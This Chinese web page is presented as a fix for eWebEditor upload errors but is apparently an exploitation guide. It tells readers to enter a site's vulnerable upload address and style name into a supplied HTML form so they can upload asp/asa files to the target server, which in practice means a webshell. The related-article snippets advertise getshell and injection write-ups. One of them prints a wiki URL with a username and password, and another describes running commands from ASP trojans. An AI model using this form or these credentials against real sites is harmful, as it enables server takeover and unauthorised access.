网站优化

首页 > 新闻资讯 > 网站优化 > ewebeditor编辑器上传错误的问题解决

ewebeditor编辑器上传错误的问题解决

2019-09-12 热度:159 ℃
有时候进了ewebeditor编辑器后台,上传类型修改后可以上传asp和asa等等。
 
可是由于一些原因.却上传不了或上传后提示找不到文件,或者无法显示等等。
 
用法:在地址上填编辑器上传漏洞地址,样式名上填编辑器的样式名,然后上传你所要上传的文件就行了。
 
然后,在源文件找地址。

<script language=javascript>parent.UploadError('无效的样式ID号,请通过页面上的链接进行操作!');history.back()</script>  
<HTML>  
<HEAD>  
<TITLE>文件上传</TITLE>  
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">  
<style type="text/css">   
body, a, table, div, span, td, th, input, select{font:9pt;font-family: "宋体", Verdana, Arial, Helvetica, sans-serif;}  
body {padding:0px;margin:0px}  
</style>  
<script language="JavaScript" src="dialog/dialog.js"></script>  
</head>  
<body bgcolor=menu>  
<form action=" www.2cto.com /path/upload.asp?action=save&type=&style=样式名" method=post name=myform enctype="multipart/form-data">  
<input type=file name=uploadfile size=1 style="width:100%">  
<input type=submit value="上传了"></input>  
<script language=javascript>  
var sAllowExt = "";  
// 检测上传表单  
function CheckUploadForm() {  
if (!IsExt(document.myform.uploadfile.value,sAllowExt)){  
   parent.UploadError("提示:\n\n请选择一个有效的文件,\n支持的格式有("+sAllowExt+")!");  
   return false;  
}  
return true  
}   
// 提交事件加入检测表单  
var oForm = document.myform ;  
oForm.attachEvent("onsubmit", CheckUploadForm) ;  
if (! oForm.submitUpload) oForm.submitUpload = new Array() ;  
oForm.submitUpload[oForm.submitUpload.length] = CheckUploadForm ;  
if (! oForm.originalSubmit) {  
oFormoForm.originalSubmit = oForm.submit ;  
oForm.submit = function() {  
   if (this.submitUpload) {  
    for (var i = 0 ; i < this.submitUpload.length ; i++) {  
     this.submitUpload() ;  
    }  
   }  
   this.originalSubmit() ;  
}  
}  
// 上传表单已装入完成  
try {  
parent.UploadLoaded();  
}  
catch(e){  
}  
</script>  
</body>  
</html> 

相关文章

分析PHPMyWind v4.5.2 0day漏洞

分析PHPMyWind v4.5.2 0day漏洞

代码:   define('PHPMYWIND_INC', preg_replace("/[\/\\\\]{1,}/", '...

代码审计:csdjcms(程氏舞曲管理系统) V 3.0 getshell漏洞

代码审计:csdjcms(程氏舞曲管理系统) V 3.0 getshell漏洞

/*******************************************************/ /* csdjcms < V 3.0 getshell...

ShopEx某wiki系统弱密码导致大量敏感信息和源码泄漏

ShopEx某wiki系统弱密码导致大量敏感信息和源码泄漏

http://workspace.ec-ae.com/wiki/index.php 帐号:lixiaoli 密码:19731125 然后通过wiki 找出3...

wscript.shell组件被禁用时 可以用Shell.Application执行命令

wscript.shell组件被禁用时 可以用Shell.Application执行命令

wscript.shell 和 shell.application 这两个组件都是来执行程序的,因此是最不安全的组件。目前很多asp木马执行命令都是用的 wscript.shell ,忽...

易想团购sms.php SQL注入漏洞分析及利用

易想团购sms.php SQL注入漏洞分析及利用

首发:http://club.freebuf.com/?/question/416 by 0x53sec http://www.freebuf.com/author/0x53sec...

审计phpshe v1.1多处SQL注入和文件包含漏洞Getshell

审计phpshe v1.1多处SQL注入和文件包含漏洞Getshell

/*******************************************************/ /* Phpshe v1.1 Vulnerability /*...

分析电子商务网的短信发送安全

分析电子商务网的短信发送安全

/* title:谈电子商务网站短信发送安全策略  blog:http://yxmhero1989.blog.163.com/blog/static/112157956201...

如何减小DDoS攻击的发生率和破坏力?

如何减小DDoS攻击的发生率和破坏力?

毫无疑问,近期策划重大DDoS攻击的那些人对互联网的内部运作原理有着深入了解。由于攻击者对这些专业知识的掌握了解,以及一些重要互联网协议缺少基本安全保障,导致当谈到保护企业自身安全和防范...

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!